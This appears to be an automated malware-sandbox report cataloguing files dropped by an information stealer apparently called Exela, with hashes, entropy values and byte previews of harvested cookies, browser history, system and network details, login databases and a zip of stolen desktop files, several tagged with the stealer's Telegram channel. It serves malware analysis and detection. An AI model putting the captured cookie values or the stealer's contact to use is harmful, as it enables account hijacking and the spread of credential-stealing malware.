                                                                                                                                                                                                                                  Preview:blat

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420.zip

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):695278
                                                                                                                                                                                                                                  Entropy (8bit):7.99809385153144
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:12288:waybHh4M8hlTwRUDesLCXiso4UVw9DGkYAZAQFR+WbWyQWCAqEXJY7:bGGht4UD9LCFvNAOWyQQX27
                                                                                                                                                                                                                                  MD5:C0539707D3F352C00830D4DBF491BEAB
                                                                                                                                                                                                                                  SHA1:0AA9EAFAE8A3A498B6C30CC0C6C9FA8664DCB068
                                                                                                                                                                                                                                  SHA-256:FE49FB14BDC24C1846CADEA41E70E517C33CEBD3D9AE6C092319C00EE15684C0
                                                                                                                                                                                                                                  SHA-512:9184F6FC73D91F1F82FD8EC9844B6FB6B1C623B7BDB8431BF61629A6531D5C383E655EF485F15F6D78523E0C68686B263B91CF086CC8ECEF6580261AD793D0A4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK..........\Y................Browsers/PK..........\Y................Wallets/PK..........\Y.4...W.........Display (1).pngl.{<...?|m&..&..M+sH'.aR1.....9F....9.J.(9.B..9.,.$.a.|.9sO..........v.=.].....z]....G.....8..r....O!....CM<M....}.....{.....M.(.f.s...c.......@Mn........m_...4..1q.}..+.......A.*.w..6r....n....h%...m.;a.r....N^..@..y....9.;g.^......Y.#..?ODX..iT.M.?j.7..T..]m....>...'..1e.S@F....3.G.\.&.n.xYi.v...wB..9...$.#....._....v_.'......*.k...y..C..../.F..mhOdL...\I........>.1.t1...7......;....JUL]h.R`nOO..t.QP[.....F{....OD{../~-k...V.....&?...[O......|.S....o....V.y...yy....p..'.X.K...Z.^.O&...[.v*mg.'.Zv..(....$.9T9.(...1GP...h....w../.v8.3....B...E.\.....j......B.j.V.%l...v...m.e...5...c<...?....!\.Q..b.<..*..[....E......^.M.k.t.tn7H.....$.D_W>.hTo..5.A.!k.....Q..?.k.]......m..U,..w......*...!..l.U.Q......ke.lX....`.........W.2...E.>6...%k.&V.......C.m8-.(.^.t.@....5........wPU.)..x....a.=R....H.........U[..q.]..,.#...

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\Browsers\Cookies.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                                                                                  Entropy (8bit):5.368010392687688
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:L6s74QVLP3ClDuyXv3RdJqmOvO65+7273uM:LDlJy/3nJqm2X1KM
                                                                                                                                                                                                                                  MD5:5A04A94A805B9546276D42B3D1D5FBD4
                                                                                                                                                                                                                                  SHA1:83E94C6A2B31AA39C6BEFC9D05F5DC7409E7E203
                                                                                                                                                                                                                                  SHA-256:A491D18C252AA087E3F1B84AA67542D47BF40BA70DCE126EAC0E793E31DC7F98
                                                                                                                                                                                                                                  SHA-512:1A34E323173A18A291BBB40380C0A429598AF0D49EE86EF574A58FA01DCF2F115598E0316D856937DA61EAACF27CA8DDFB39D9D44F75440119D97BF913DA31BF
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================...google.com.TRUE./.FALSE.13356771602392648.NID.511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg...google.com.TRUE./.FALSE.13343552440345167.1P_JAR.2023-10-05-06..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\Browsers\Firefox\History.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1295
                                                                                                                                                                                                                                  Entropy (8bit):4.0154987872336445
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:L6cJ8493sMwlookqCVorJW2493szwvaacAhZmKpokqCVorJs57oSQokqCVorJS47:L5xsMvXvxsajXJl1QXbsBQXY6CQExX3
                                                                                                                                                                                                                                  MD5:D305DDE0BE4E1BE415C5CD7AC89D871F
                                                                                                                                                                                                                                  SHA1:16BD19908793C625ED001BE4C7A1E5671DDD6AC2
                                                                                                                                                                                                                                  SHA-256:1B6D4F6D514FB0C8793014C55FBBC8CCEB7936DE36CE0DD1FB6E1BD4B357977C
                                                                                                                                                                                                                                  SHA-512:25ABFB49992328344EA727090E4CD1CAB65778239940D2B591E2DC796755905D10EC0F9B415B1B94D3747620510AA3582F24BDADA13D009C1159DFA4D3363B68
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..ID: 1..RL: https://support.mozilla.org/products/firefox..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 2..RL: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-browser&utm_medium=default-bookmarks&utm_campaign=customize..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 3..RL: https://www.mozilla.org/contribute/..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 4..RL: https://www.mozilla.org/about/..Title: None..Visit Count: 0..Last Visit Time: None..=========================================================================

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\Display (1).png

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):695758
                                                                                                                                                                                                                                  Entropy (8bit):7.927157243130488
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:nP54EwJMB9qOzqeCblMzJR51imdAoxa1wz+o68K7KxmUa274eAy:nKJMaOmeCbl0Jpik2o68t4UxEy
                                                                                                                                                                                                                                  MD5:45F2A51D425B351AFFC136460DB723F2
                                                                                                                                                                                                                                  SHA1:E57407EF929740B0DD6A29B32C54E75D5F9F5359
                                                                                                                                                                                                                                  SHA-256:BBAD0BD0F722169F2F775F7C3C4AF3C8FC5C29AADFEF0569B1DEE6F96ADA294A
                                                                                                                                                                                                                                  SHA-512:8F384ADCD85CC7BE54932CECF811F39EA57B04B941874E6BB9E02F4C6D7259F7CB0E28A245774E6B34C81FB250C45997D63A1A311AC7F73608A93D04DE56BBB3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....]............_.m........jWU..VQv........d..\6`...`@..`3.0...<a03.4.b..$f..!....._..?.o.>w.{S....oE..q.)l.v..h..r.,/...8wflE...:s]G.gL....=L2n....w...N{...7"C..x_.d"....:J.5.q.........+.o.G...b.D..Vo.Nxn..X.lW../V..y\..C...7....1.....66h.G=..C..?.?U1.'.=..C_ybb........zb(...U}......_..>....G>.........{...O?\1t.C.s...y....b.S.....2.1.O..|"...;.}<..A.c.V...=#............}.....C.........s4V,.C..;......C..c...^1..;.`.-.....A+....F..>..nK..."..l_9........c.h.pkh..9..0....p.k.P...`...L90.U.X......C..R..x{....c..ax.e..bj..;7e..Sl.~7.)..}b~;....ky...,4.\..{,I}.S....c...i..sK..s..v...G;...o.vS.c<..i.8.66..G.C.F.X.....-a<.{..mq...MUl...i{.}c...N.#..=..M.....5..n7&.v]....P............){,N......ki.1?-~...O....j....q...;.`...s....#....1<..8&'.Y..E.<.....x......K.....F.5g][..9.0en...A{..v..fN.....V..c....Y.OLy.8....y.;.1.O......5)....).\].k1..i.)q,.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\network_info.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):272
                                                                                                                                                                                                                                  Entropy (8bit):4.249865965726774
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:111T8/s5hO7y9ENLXRULUfUN33YE96ZnXEUcatMWAqpmEdqNVEcatMWAqpmn:Lv5hObLoU8N3596ZnXEteMWKdeMWo
                                                                                                                                                                                                                                  MD5:169DE19E1E86AE9A16A2E84264B422A4
                                                                                                                                                                                                                                  SHA1:7441BC1E1D1E3A17C358B4958EFB54A8A57087A0
                                                                                                                                                                                                                                  SHA-256:DBA652F28E595F9935BF2C24AF085FE49589D92C733F8DE43AFDC0DF6889220D
                                                                                                                                                                                                                                  SHA-512:8E5C1FFD06D997D1AB5A587E032520711B5258257287C673F8761EB7D3488485D1D9CDC82DD0D86E092F58F172BF5BAB7205EC546F90A5BFC56CA6E0EB7E1A76
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..155.94.241.188..United States..Dallas..America/Chicago..QuadraNet Enterprises LLC QuadraNet, Inc AS8100 QuadraNet Enterprises LLC

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\process_info.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24002
                                                                                                                                                                                                                                  Entropy (8bit):4.535676657650418
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:GaZpkcJhI8tLWfWCPn4+lL84K6xWUYCpH91ZdO0HzLBKIWUimMpPaEna0LKpEV80:I3d4+CkI
                                                                                                                                                                                                                                  MD5:277B6E906DD6F29DC4BAD455639C5165
                                                                                                                                                                                                                                  SHA1:C3F79EA16CF9158B56EEE8598464358F191A45A1
                                                                                                                                                                                                                                  SHA-256:A4009A7FEF1F899DF2A8185CA0A331E6CF855B0225713DA0ED0DE9500B19061F
                                                                                                                                                                                                                                  SHA-512:0BA2B529FD1FFF22EF3415A9B6CCEF4864A1EFEB6C1C6E144F33A5D17E8312A139F17A2A8C8176F2E28344CFAE4CCE9E34F200F03261E9C245748B68E0271FFB
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================.....Image Name: System Idle Process...PID: 0...Session Name: Services...Session#: 0...Mem Usage: 8 K......Image Name: System...PID: 4...Session Name: Services...Session#: 0...Mem Usage: 180 K......Image Name: Registry...PID: 92...Session Name: Services...Session#: 0...Mem Usage: 78'652 K......Image Name: smss.exe...PID: 328...Session Name: Services...Session#: 0...Mem Usage: 1'224 K......Image Name: csrss.exe...PID: 412...Session Name: Services...Session#: 0...Mem Usage: 5'256 K......Image Name: wininit.exe...PID: 488...Session Name: Services...Session#: 0...Mem Usage: 7'244 K......Image Name: csrss.exe...PID: 496...Session Name: Console...Session#: 1...Mem Usage: 5'984 K......Image Name: winlogon.exe...PID: 560

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\system_info.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:Algol 68 source, ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):142588
                                                                                                                                                                                                                                  Entropy (8bit):4.338053793586404
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:8lF3X6mhzCm7oVYT2XfXBy2d+EaUzi2MkiLaYS4g6OH5SyjxggdBNtF7+Jh3NKvd:gFHcOC
                                                                                                                                                                                                                                  MD5:8D31DE855FB95EB655E373C93B29EE63
                                                                                                                                                                                                                                  SHA1:4EDAF64A227ACC003806ED617D940DEB83C655A8
                                                                                                                                                                                                                                  SHA-256:A5C161CAFBB96CA95D64F61279C4D653ED423291084CDCB5A4D0D59F832DC80C
                                                                                                                                                                                                                                  SHA-512:7D1EC01A260388892A70C1E7CD90BED1DA74B687469499C75129FEE7E3B0B029C9320DC3FFE36772B00233F3A596E65B75BAC44C816D07F29404D1A3041BEEFA
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..####System Info#### ......Host Name: user-PC...OS Name: Microsoft Windows 10 Pro...OS Version: 10.0.19045 N/A Build 19045...OS Manufacturer: Microsoft Corporation...OS Configuration: Standalone Workstation...OS Build Type: Multiprocessor Free...Registered Owner: hardz...Registered Organization: ...Product ID: 00330-71388-77086-AAOEM...Original Install Date: 03/10/2023, 10:57:18...System Boot Time: 25/09/2023, 08:44:03...System Manufacturer: 4xVfVO2OWpDoKPf...System Model: X9gnKrZ3...System Type: x64-based PC...Processor(s): 2 Processor(s) Installed.... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz... [02]: I

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\AutofillData.db

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Cookies.db

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\DownloadData.db

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\HistoryData.db

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Logins.db

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                                                                                  Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela.zip

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):55856
                                                                                                                                                                                                                                  Entropy (8bit):7.813989735548388
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:JXzUaFS9wzXm6THM2BaJILfO+GoRp6zovdi3qQH2mQyiTrtkjL:JjUz0TMTc3RYsCrQsL
                                                                                                                                                                                                                                  MD5:7867758E58C5E7B410EA72D6BF5A91C3
                                                                                                                                                                                                                                  SHA1:D9EBB5DC94CC24CB0A090BE6645AFEB63CF0294A
                                                                                                                                                                                                                                  SHA-256:EC62F85A27399D2BEF59179759A0C6A23D8E41545B4AE53C1D718BD1DB92AE57
                                                                                                                                                                                                                                  SHA-512:652FBACF278EAFEF0AE84F7F040915C8B33DA03C4ADA26C6B329370EC653E4069E456B6845357045E2C6D226722C08CE7D01DAA0754A56704C26C2EC99183A8A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK..........\Y................Desktop/PK..........\Y................Documents/PK..........\Y................Downloads/PK..........\Y................IPKGELNTQY/PK..........\Y................LSBIHQFDVT/PK..........\Y................NEBFQQYWPS/PK..........EWA.]............Desktop/EFOYFBOLXA.png..In@!.C..z.0C .!....)U...l[W?.j>..|2..o...xkM.`.Bk...N.Z.,w.....d..@.....^:0..>%......7(G..CK.O..H...3..m..I..CT.K.}.eJ....%Y......L<.t3...XT...A..>..^o..x.tpN....QI.G...N.k.......g.:.....m1..0..!X>{.w._.d....*...~..S..k..b.%..k..>X......C...Zg...<..O....Z]y....zG.....S;.Cn.s@..yF.{.gh+.....~J.'*s..n_W....f.,...O++x^......P....t..q..<..c'D.H.n..=x..._S..5|..M.6g.z...~.U...).)B#~.;`p-1.q..LapN.B..#.....J.Z_:.1..j......0x.{]*.'...pV..N../I.dM...kp`.P..../..n...bp>....qNv..p.Msv...NL.$0N.|`...p...F....v...*.v!...W..........x...|T.u1'.*..f...le`.1...WQ.........Y..|al...u...0...../+....kU..NF_..{.k.`~...PK..........EW..d)............Desktop/GAOBCVIQIJ.png...E1.E.#.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\EFOYFBOLXA.png

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.696178193607948
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                                                                                                                                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                                                                                                                                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                                                                                                                                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                                                                                                                                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\GAOBCVIQIJ.png

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.701188456968639
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                                                                                                                                                                                                  MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                                                                                                                                                                                                  SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                                                                                                                                                                                                  SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                                                                                                                                                                                                  SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                                                                                                                                                                                                  Malicious:false
